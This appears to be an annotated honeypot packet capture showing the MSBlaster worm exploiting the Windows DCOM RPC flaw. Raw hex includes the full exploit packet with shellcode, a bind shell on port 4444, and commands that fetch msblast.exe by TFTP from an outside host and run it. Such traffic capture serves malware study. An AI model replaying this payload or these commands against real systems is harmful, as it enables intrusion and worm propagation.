MSBlaster Worm !!!
Initial TCP connection against 135 port !!!
00:36:47.442087 XXX.XX.XXX.117.64551 >
XXX.XX.X.127.135: S 75459348:75459348(0) win 64240 <mss 1420,nop,nop,sackOK>
(DF)
0x0000 4500 0030 6f0f 4000 7306 b990 d529 8075 E..0o.@.s....).u
0x0010 800a 097f fc27 0087 047f 6b14 0000 0000 .....'....k.....
0x0020 7002 faf0 3cec 0000 0204 058c 0101 0402 p...<...........
00:36:56.290818 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: S
4243709684:4243709684(0) ack 75459349 win 17040 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 075f 4000 8006 1441 800a 097f E..0._@....A....
0x0010 d529 8075 0087 fc27 fcf1 def4 047f 6b15 .).u...'......k.
0x0020 7012 4290 192d 0000 0204 05b4 0101 0402 p.B..-..........
00:36:56.383247 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: . ack 1 win 17040 (DF)
0x0000 4500 0028 0760 4000 8006 1448 800a 097f E..(.`@....H....
0x0010 d529 8075 0087 fc27 fcf1 def5 047f 6b15 .).u...'......k.
0x0020 5010 4290 45f1 0000 0204 05b4 0103 P.B.E.........
00:36:56.490521 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: . ack 1 win 65320 (DF)
0x0000 4500 0028 6f67 4000 7306 b940 d529 8075 E..(og@.s..@.).u
0x0010 800a 097f fc27 0087 047f 6b15 fcf1 def5 .....'....k.....
0x0020 5010 ff28 8958 0000 8900 0000 0000 P..(.X........
00:37:05.394339 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: P 1:73(72) ack 1 win
65320 (DF)
0x0000 4500 0070 6fa1 4000 7306 b8be d529 8075 E..po.@.s....).u
0x0010 800a 097f fc27 0087 047f 6b15 fcf1 def5 .....'....k.....
0x0020 5018 ff28 401f 0000 0500 0b03 1000 0000 P..(@...........
0x0030 4800 0000 7f00 0000 d016 d016 0000 0000 H...............
0x0040 0100 0000 0100 0100 a001 0000 0000 0000 ................
0x0050 c000 0000 0000 0046 0000 0000 045d 888a .......F.....]..
0x0060 eb1c c911 9fe8 0800 2b10 4860 0200 0000 ........+.H`....
00:37:05.397131 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: P 1:61(60) ack 73 win
16968 (DF)
0x0000 4500 0064 0761 4000 8006 140b 800a 097f E..d.a@.........
0x0010 d529 8075 0087 fc27 fcf1 def5 047f 6b5d .).u...'......k]
0x0020 5018 4248 8ba2 0000 0500 0c03 1000 0000 P.BH............
0x0030 3c00 0000 7f00 0000 d016 d016 7436 0000 <...........t6..
0x0040 0400 3133 3500 0000 0100 0000 0000 0000 ..135...........
0x0050 045d 888a eb1c c911 9fe8 0800 2b10 4860 .]..........+.H`
0x0060 0200 0000 ....
00:37:05.397144 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: P 1:61(60) ack 73 win
16968 (DF)
0x0000 4500 0064 0761 4000 8006 140b 800a 097f E..d.a@.........
0x0010 d529 8075 0087 fc27 fcf1 def5 047f 6b5d .).u...'......k]
0x0020 5018 4248 8ba2 0000 0500 0c03 1000 0000 P.BH............
0x0030 3c00 0000 7f00 0000 d016 d016 7436 0000 <...........t6..
0x0040 0400 3133 3500 0000 0100 0000 0000 0000 ..135...........
0x0050 045d 888a eb1c c911 9fe8 0800 2b10 4860 .]..........+.H`
0x0060 0200 0000 ....
Malicious packet containting exploit code of DCOM_RPC !!!
00:37:05.434426
XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: . 73:1493(1420) ack 1 win 65320 (DF)
0x0000 4500 05b4 6fa2 4000 7306 b379 d529 8075 E...o.@.s..y.).u
0x0010 800a 097f fc27 0087 047f 6b5d fcf1 def5 .....'....k]....
0x0020 5010 ff28 172e 0000 0500 0003 1000 0000 P..(............
0x0030 a806 0000 e500 0000 9006 0000 0100 0400 ................
0x0040 0500 0600 0100 0000 0000 0000 3224 58fd ............2$X.
0x0050 cc45 6449 b070 ddae 742c 96d2 605e 0d00 .EdI.p..t,..`^..
0x0060 0100 0000 0000 0000 705e 0d00 0200 0000 ........p^......
0x0070 7c5e 0d00 0000 0000 1000 0000 8096 f1f1 |^..............
0x0080 2a4d ce11 a66a 0020 af6e 72f4 0c00 0000 *M...j...nr.....
0x0090 4d41 5242 0100 0000 0000 0000 0df0 adba MARB............
0x00a0 0000 0000 a8f4 0b00 2006 0000 2006 0000 ................
0x00b0 4d45 4f57 0400 0000 a201 0000 0000 0000 MEOW............
0x00c0 c000 0000 0000 0046 3803 0000 0000 0000 .......F8.......
0x00d0 c000 0000 0000 0046 0000 0000 f005 0000 .......F........
0x00e0 e805 0000 0000 0000 0110 0800 cccc cccc ................
0x00f0 c800 0000 4d45 4f57 e805 0000 d800 0000 ....MEOW........
0x0100 0000 0000 0200 0000 0700 0000 0000 0000 ................
0x0110 0000 0000 0000 0000 0000 0000 c428 cd00 .............(..
0x0120 6429 cd00 0000 0000 0700 0000 b901 0000 d)..............
0x0130 0000 0000 c000 0000 0000 0046 ab01 0000 ...........F....
0x0140 0000 0000 c000 0000 0000 0046 a501 0000 ...........F....
0x0150 0000 0000 c000 0000 0000 0046 a601 0000 ...........F....
0x0160 0000 0000 c000 0000 0000 0046 a401 0000 ...........F....
0x0170 0000 0000 c000 0000 0000 0046 ad01 0000 ...........F....
0x0180 0000 0000 c000 0000 0000 0046 aa01 0000 ...........F....
0x0190 0000 0000 c000 0000 0000 0046 0700 0000 ...........F....
0x01a0 6000 0000 5800 0000 9000 0000 4000 0000 `...X.......@...
0x01b0 2000 0000 3803 0000 3000 0000 0100 0000 ....8...0.......
0x01c0 0110 0800 cccc cccc 5000 0000 4fb6 8820 ........P...O...
0x01d0 ffff ffff 0000 0000 0000 0000 0000 0000 ................
0x01e0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x01f0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0200 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0210 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0220 0110 0800 cccc cccc 4800 0000 0700 6600 ........H.....f.
0x0230 0609 0200 0000 0000 c000 0000 0000 0046 ...............F
0x0240 1000 0000 0000 0000 0000 0000 0100 0000 ................
0x0250 0000 0000 7819 0c00 5800 0000 0500 0600 ....x...X.......
0x0260 0100 0000 70d8 9893 984f d211 a93d be57 ....p....O...=.W
0x0270 b200 0000 3200 3100 0110 0800 cccc cccc ....2.1.........
0x0280 8000 0000 0df0 adba 0000 0000 0000 0000 ................
0x0290 0000 0000 0000 0000 1843 1400 0000 0000 .........C......
0x02a0 6000 0000 6000 0000 4d45 4f57 0400 0000 `...`...MEOW....
0x02b0 c001 0000 0000 0000 c000 0000 0000 0046 ...............F
0x02c0 3b03 0000 0000 0000 c000 0000 0000 0046 ;..............F
0x02d0 0000 0000 3000 0000 0100 0100 81c5 1703 ....0...........
0x02e0 800e e94a 9999 f18a 506f 7a85 0200 0000 ...J....Poz.....
0x02f0 0000 0000 0000 0000 0000 0000 0000 0000 ................
0x0300 0000 0000 0100 0000 0110 0800 cccc cccc ................
0x0310 3000 0000 7800 6e00 0000 0000 d8da 0d00 0...x.n.........
0x0320 0000 0000 0000 0000 202f 0c00 0000 0000 ........./......
0x0330 0000 0000 0300 0000 0000 0000 0300 0000 ................
0x0340 4600 5800 0000 0000 0110 0800 cccc cccc F.X.............
0x0350 1000 0000 3000 2e00 0000 0000 0000 0000 ....0...........
0x0360 0000 0000 0000 0000 0110 0800 cccc cccc ................
0x0370 6800 0000 0e00 ffff 688b 0b00 0200 0000 h.......h.......
0x0380 0000 0000 0000 0000 8601 0000 0000 0000 ................
0x0390 8601 0000 5c00 5c00 4600 5800 4e00 4200 ....\.\.F.X.N.B.
0x03a0 4600 5800 4600 5800 4e00 4200 4600 5800 F.X.F.X.N.B.F.X.
0x03b0 4600 5800 4600 5800 4600 5800 9d13 0001 F.X.F.X.F.X.....
0x03c0 cce0 fd7f cce0 fd7f 9090 9090 9090 9090 ................
0x03d0 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x03e0 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x03f0 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0400 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0410 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0420 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0430 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0440 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0450 9090 9090 9090 9090 9090 9090 9090 9090 ................
0x0460 9090 9090 9090 9090 9090 9090 9090 90eb ................
0x0470 195e 31c9 81e9 89ff ffff 8136 80bf 3294 .^1........6..2.
0x0480 81ee fcff ffff e2f2 eb05 e8e2 ffff ff03 ................
0x0490 5306 1f74 5775 9580 bfbb 927f 895a 1ace S..tWu.......Z..
0x04a0 b1de 7ce1 be32 9409 f93a 6bb6 d79f 4d85 ..|..2...:k...M.
0x04b0 71da c681 bf32 1dc6 b35a f8ec bf32 fcb3 q....2...Z...2..
0x04c0 8d1c f0e8 c841 a6df ebcd c288 3674 907f .....A......6t..
0x04d0 895a e67e 0c24 7cad be32 9409 f922 6bb6 .Z.~.$|..2..."k.
0x04e0 d74c 4c62 ccda 8a81 bf32 1dc6 abcd e284 .LLb.....2......
0x04f0 d7f9 797c 84da 9a81 bf32 1dc6 a7cd e284 ..y|.....2......
0x0500 d7eb 9d75 12da 6a80 bf32 1dc6 a3cd e284 ...u..j..2......
0x0510 d796 8ef0 78da 7a80 bf32 1dc6 9fcd e284 ....x.z..2......
0x0520 d796 39ae 56da 4a80 bf32 1dc6 9bcd e284 ..9.V.J..2......
0x0530 d7d7 dd06 f6da 5a80 bf32 1dc6 97cd e284 ......Z..2......
0x0540 d7d5 ed46 c6da 2a80 bf32 1dc6 9301 6b01 ...F..*..2....k.
0x0550 53a2 9580 bf66 fc81 be32 947f e92a c4d0 S....f...2...*..
0x0560 ef62 d4d0 ff62 6bd6 a3b9 4cd7 e85a 9680 .b...bk...L..Z..
0x0570 ae6e 1f4c d524 c5d3 4064 b4d7 eccd c2a4 .n.L.$..@d......
0x0580 e863 c77f e91a 1f50 d757 ece5 bf5a f7ed .c.....P.W...Z..
0x0590 db1c 1de6 8fb1 78d4 320e b0b3 7f01 5d03 ......x.2.....].
0x05a0 7e27 3f62 42f4 d0a4 af76 6ac4 9b0f 1dd4 ~'?bB....vj.....
0x05b0 9b7a 1dd4 .z..
00:37:05.441549 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: P 1493:1777(284) ack 1
win 65320 (DF)
0x0000 4500 0144 6fa3 4000 7306 b7e8 d529 8075 E..Do.@.s....).u
0x0010 800a 097f fc27 0087 047f 70e9 fcf1 def5 .....'....p.....
0x0020 5018 ff28 4dec 0000 9b7e 1dd4 9b62 19c4 P..(M....~...b..
0x0030 9b22 c0d0 ee63 c5ea be63 c57f c902 c57f ."...c...c......
0x0040 e922 1f4c d5cd 6bb1 4064 980b 7765 6bd6 .".L..k.@d..wek.
0x0050 93cd c294 ea64 f021 8f32 9480 3af2 ec8c .....d.!.2..:...
0x0060 3472 980b cf2e 390b d73a 7f89 3472 a00b 4r....9..:..4r..
0x0070 178a 9480 bfb9 51de e2f0 9080 ec67 c2d7 ......Q......g..
0x0080 345e b098 3477 a80b eb37 ec83 6ab9 de98 4^..4w...7..j...
0x0090 3468 b483 62d1 a6c9 3406 1f83 4a01 6b7c 4h..b...4...J.k|
0x00a0 8cf2 38ba 7b46 9341 703f 9778 54c0 affc ..8.{F.Ap?.xT...
0x00b0 9b26 e161 3468 b083 6254 1f8c f4b9 ce9c .&.a4h..bT......
0x00c0 bcef 1f84 3431 516b bd01 540b 6a6d cadd ....41Qk..T.jm..
0x00d0 e4f0 9080 2fa2 0400 5c00 4300 2400 5c00 ..../...\.C.$.\.
0x00e0 3100 3200 3300 3400 3500 3600 3100 3100 1.2.3.4.5.6.1.1.
0x00f0 3100 3100 3100 3100 3100 3100 3100 3100 1.1.1.1.1.1.1.1.
0x0100 3100 3100 3100 3100 3100 2e00 6400 6f00 1.1.1.1.1...d.o.
0x0110 6300 0000 0110 0800 cccc cccc 2000 0000 c...............
0x0120 3000 2d00 0000 0000 882a 0c00 0200 0000 0.-......*......
0x0130 0100 0000 288c 0c00 0100 0000 0700 0000 ....(...........
0x0140 0000 0000 ....
00:37:05.443820 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: F 1777:1777(0) ack 1
win 65320 (DF)
0x0000 4500 0028 6fa4 4000 7306 b903 d529 8075 E..(o.@.s....).u
0x0010 800a 097f fc27 0087 047f 7205 fcf1 def5 .....'....r.....
0x0020 5011 ff28 8267 0000 8200 0000 0000 P..(.g........
00:37:05.446575 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: . ack 1777 win 17040
(DF)
0x0000 4500 0028 0762 4000 8006 1446 800a 097f E..(.b@....F....
0x0010 d529 8075 0087 fc27 fcf1 df31 047f 7205 .).u...'...1..r.
0x0020 5010 4290 3ec5 0000 0204 05b4 0103 P.B.>.........
00:37:05.446587 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: . ack 1777 win 17040
(DF)
0x0000 4500 0028 0762 4000 8006 1446 800a 097f E..(.b@....F....
0x0010 d529 8075 0087 fc27 fcf1 df31 047f 7205 .).u...'...1..r.
0x0020 5010 4290 3ec5 0000 0204 05b4 0103 P.B.>.........
00:37:05.446919 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: . ack 1778 win 17040
(DF)
0x0000 4500 0028 0763 4000 8006 1445 800a 097f E..(.c@....E....
0x0010 d529 8075 0087 fc27 fcf1 df31 047f 7206 .).u...'...1..r.
0x0020 5010 4290 3ec4 0000 0204 05b4 0101 P.B.>.........
00:37:05.446923 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: . ack 1778 win 17040
(DF)
0x0000 4500 0028 0763 4000 8006 1445 800a 097f E..(.c@....E....
0x0010 d529 8075 0087 fc27 fcf1 df31 047f 7206 .).u...'...1..r.
0x0020 5010 4290 3ec4 0000 0204 05b4 0101 P.B.>.........
00:37:05.452887 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: F 61:61(0) ack 1778 win
17040 (DF)
0x0000 4500 0028 0764 4000 8006 1444 800a 097f E..(.d@....D....
0x0010 d529 8075 0087 fc27 fcf1 df31 047f 7206 .).u...'...1..r.
0x0020 5011 4290 3ec3 0000 6d6e 6f70 7172 P.B.>...mnopqr
00:37:05.452901 XXX.XX.X.127.135 > XXX.XX.XXX.117.64551: F 61:61(0) ack 1778 win
17040 (DF)
0x0000 4500 0028 0764 4000 8006 1444 800a 097f E..(.d@....D....
0x0010 d529 8075 0087 fc27 fcf1 df31 047f 7206 .).u...'...1..r.
0x0020 5011 4290 3ec3 0000 6d6e 6f70 7172 P.B.>...mnopqr
00:37:05.557116 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: R 75461126:75461126(0)
win 0 (DF)
0x0000 4500 0028 6fa5 4000 7306 b902 d529 8075 E..(o.@.s....).u
0x0010 800a 097f fc27 0087 047f 7206 fcf1 def5 .....'....r.....
0x0020 5004 0000 819c 0000 8100 0000 0000 P.............
00:37:05.606565 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: R 75461125:75461125(0)
win 0
0x0000 4500 0028 6fa6 0000 7306 f901 d529 8075 E..(o...s....).u
0x0010 800a 097f fc27 0087 047f 7205 047f 7205 .....'....r...r.
0x0020 5004 0000 e700 0000 e700 0000 0000 P.............
00:37:05.608817 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: R 75461126:75461126(0)
win 0
0x0000 4500 0028 6fa7 0000 7306 f900 d529 8075 E..(o...s....).u
0x0010 800a 097f fc27 0087 047f 7206 047f 7206 .....'....r...r.
0x0020 5004 0000 e6fe 0000 e600 0000 0000 P.............
00:37:05.611065 XXX.XX.XXX.117.64551 > XXX.XX.X.127.135: R 75461126:75461126(0)
win 0
0x0000 4500 0028 6fa8 0000 7306 f8ff d529 8075 E..(o...s....).u
0x0010 800a 097f fc27 0087 047f 7206 047f 7206 .....'....r...r.
0x0020 5004 0000 e6fe 0000 e600 0000 0000 P.............
A Shell is listening on port 4444 enabled by exploit code !!!
00:37:05.794502 XXX.XX.XXX.117.64562 >
XXX.XX.X.127.4444: S 80586849:80586849(0) win 64240 <mss 1420,nop,nop,sackOK>
(DF)
0x0000 4500 0030 6fa9 4000 7306 b8f6 d529 8075 E..0o.@.s....).u
0x0010 800a 097f fc32 115c 04cd a861 0000 0000 .....2.\...a....
0x0020 7002 faf0 ee70 0000 0204 058c 0101 0402 p....p..........
00:37:05.795150 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: S
4247968248:4247968248(0) ack 80586850 win 17040 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0765 4000 8006 143b 800a 097f E..0.e@....;....
0x0010 d529 8075 115c fc32 fd32 d9f8 04cd a862 .).u.\.2.2.....b
0x0020 7012 4290 cf6c 0000 0204 05b4 0101 0402 p.B..l..........
00:37:05.953375 XXX.XX.XXX.117.64562 > XXX.XX.X.127.4444: . ack 1 win 65320 (DF)
0x0000 4500 0028 6faa 4000 7306 b8fd d529 8075 E..(o.@.s....).u
0x0010 800a 097f fc32 115c 04cd a862 fd32 d9f9 .....2.\...b.2..
0x0020 5010 ff28 3f98 0000 3f00 0000 0000 P..(?...?.....
00:37:05.993856 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: P 1:40(39) ack 1 win
17040 (DF)
0x0000 4500 004f 0766 4000 8006 141b 800a 097f E..O.f@.........
0x0010 d529 8075 115c fc32 fd32 d9f9 04cd a862 .).u.\.2.2.....b
0x0020 5018 4290 10ef 0000 4d69 6372 6f73 6f66 P.B.....Microsof
0x0030 7420 5769 6e64 6f77 7320 5850 205b 5665 t.Windows.XP.[Ve
0x0040 7273 696f 6e20 352e 312e 3236 3030 5d rsion.5.1.2600]
Attacked honeypot is instructed to download msblaster !!!
00:37:06.034184 XXX.XX.XXX.117.64562 >
XXX.XX.X.127.4444: P 1:37(36) ack 1 win 65320 (DF)
0x0000 4500 004c 6fab 4000 7306 b8d8 d529 8075 E..Lo.@.s....).u
0x0010 800a 097f fc32 115c 04cd a862 fd32 d9f9 .....2.\...b.2..
0x0020 5018 ff28 93cf 0000 7466 7470 202d 6920 P..(....tftp.-i.
0x0030 3132 382e 312e 322e 3131 3020 4745 5420 128.1.2.110.GET.
0x0040 6d73 626c 6173 742e 6578 650a msblast.exe.
00:37:06.035256 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: P
40:105(65) ack 37 win 17004 (DF)
0x0000 4500 0069 0767 4000 8006 1400 800a 097f E..i.g@.........
0x0010 d529 8075 115c fc32 fd32 da20 04cd a886 .).u.\.2.2......
0x0020 5018 426c 6749 0000 0d0a 2843 2920 436f P.BlgI....(C).Co
0x0030 7079 7269 6768 7420 3139 3835 2d32 3030 pyright.1985-200
0x0040 3120 4d69 6372 6f73 6f66 7420 436f 7270 1.Microsoft.Corp
0x0050 2e0d 0a0d 0a43 3a5c 5749 4e44 4f57 535c .....C:\WINDOWS\
0x0060 7379 7374 656d 3332 3e system32>
00:37:06.035268 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: P 40:105(65) ack 37
win 17004 (DF)
0x0000 4500 0069 0767 4000 8006 1400 800a 097f E..i.g@.........
0x0010 d529 8075 115c fc32 fd32 da20 04cd a886 .).u.\.2.2......
0x0020 5018 426c 6749 0000 0d0a 2843 2920 436f P.BlgI....(C).Co
0x0030 7079 7269 6768 7420 3139 3835 2d32 3030 pyright.1985-200
0x0040 3120 4d69 6372 6f73 6f66 7420 436f 7270 1.Microsoft.Corp
0x0050 2e0d 0a0d 0a43 3a5c 5749 4e44 4f57 535c .....C:\WINDOWS\
0x0060 7379 7374 656d 3332 3e system32>
00:37:06.194022 XXX.XX.XXX.117.64562 > XXX.XX.X.127.4444: . ack 105 win 65216
(DF)
0x0000 4500 0028 6fac 4000 7306 b8fb d529 8075 E..(o.@.s....).u
0x0010 800a 097f fc32 115c 04cd a886 fd32 da61 .....2.\.....2.a
0x0020 5010 fec0 3f74 0000 3f00 0000 0000 P...?t..?.....
00:37:06.194947 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: P 105:141(36) ack 37
win 17004 (DF)
0x0000 4500 004c 0769 4000 8006 141b 800a 097f E..L.i@.........
0x0010 d529 8075 115c fc32 fd32 da61 04cd a886 .).u.\.2.2.a....
0x0020 5018 426c 5000 0000 7466 7470 202d 6920 P.BlP...tftp.-i.
0x0030 3132 382e 312e 322e 3131 3020 4745 5420 128.1.2.110.GET.
0x0040 6d73 626c 6173 742e 6578 650a msblast.exe.
00:37:06.194959 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: P 105:141(36) ack 37
win 17004 (DF)
0x0000 4500 004c 0769 4000 8006 141b 800a 097f E..L.i@.........
0x0010 d529 8075 115c fc32 fd32 da61 04cd a886 .).u.\.2.2.a....
0x0020 5018 426c 5000 0000 7466 7470 202d 6920 P.BlP...tftp.-i.
0x0030 3132 382e 312e 322e 3131 3020 4745 5420 128.1.2.110.GET.
0x0040 6d73 626c 6173 742e 6578 650a msblast.exe.
00:37:06.537816 XXX.XX.XXX.117.64562 > XXX.XX.X.127.4444: . ack 141 win 65180
(DF)
0x0000 4500 0028 6fad 4000 7306 b8fa d529 8075 E..(o.@.s....).u
0x0010 800a 097f fc32 115c 04cd a886 fd32 da85 .....2.\.....2..
0x0020 5010 fe9c 3f74 0000 3f00 0000 0000 P...?t..?.....
Worm is propagated from one machine to another!!!
The newly attacked honeypot is instructed to execute msblaster, beginning to infect others!!!
00:37:27.038198
XXX.XX.XXX.117.64562 > XXX.XX.X.127.4444: P 37:55(18) ack 141 win 65180 (DF)
0x0000 4500 003a 6fb9 4000 7306 b8dc d529 8075 E..:o.@.s....).u
0x0010 800a 097f fc32 115c 04cd a886 fd32 da85 .....2.\.....2..
0x0020 5018 fe9c 864e 0000 7374 6172 7420 6d73 P....N..start.ms
0x0030 626c 6173 742e 6578 650a blast.exe.
00:37:27.250820 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: . ack 55
win 16986 (DF)
0x0000 4500 0028 076e 4000 8006 143a 800a 097f E..(.n@....:....
0x0010 d529 8075 115c fc32 fd32 da85 04cd a898 .).u.\.2.2......
0x0020 5010 425a fba4 0000 aaaa aaaa aaaa P.BZ..........
00:37:27.250832 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: . ack 55 win 16986
(DF)
0x0000 4500 0028 076e 4000 8006 143a 800a 097f E..(.n@....:....
0x0010 d529 8075 115c fc32 fd32 da85 04cd a898 .).u.\.2.2......
0x0020 5010 425a fba4 0000 aaaa aaaa aaaa P.BZ..........
00:37:29.040057 XXX.XX.XXX.117.64562 > XXX.XX.X.127.4444: P 55:67(12) ack 141
win 65180 (DF)
0x0000 4500 0034 6fbb 4000 7306 b8e0 d529 8075 E..4o.@.s....).u
0x0010 800a 097f fc32 115c 04cd a898 fd32 da85 .....2.\.....2..
0x0020 5018 fe9c cf49 0000 6d73 626c 6173 742e P....I..msblast.
0x0030 6578 650a exe.
00:37:29.240616 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: . ack 67 win 16974
(DF)
0x0000 4500 0028 0770 4000 8006 1438 800a 097f E..(.p@....8....
0x0010 d529 8075 115c fc32 fd32 da85 04cd a8a4 .).u.\.2.2......
0x0020 5010 424e fba4 0000 2045 4e46 4445 P.BN.....ENFDE
00:37:29.240623 XXX.XX.X.127.4444 > XXX.XX.XXX.117.64562: . ack 67 win 16974
(DF)
0x0000 4500 0028 0770 4000 8006 1438 800a 097f E..(.p@....8....
0x0010 d529 8075 115c fc32 fd32 da85 04cd a8a4 .).u.\.2.2......
0x0020 5010 424e fba4 0000 2045 4e46 4445 P.BN.....ENFDE
00:37:31.045070 XXX.XX.XXX.117.64562 > XXX.XX.X.127.4444: R 80586916:80586916(0)
win 0 (DF)
0x0000 4500 0028 6fbd 4000 7306 b8ea d529 8075 E..(o.@.s....).u
0x0010 800a 097f fc32 115c 04cd a8a4 fd32 da85 .....2.\.....2..
0x0020 5004 0000 3dff 0000 3d00 0000 0000 P...=...=.....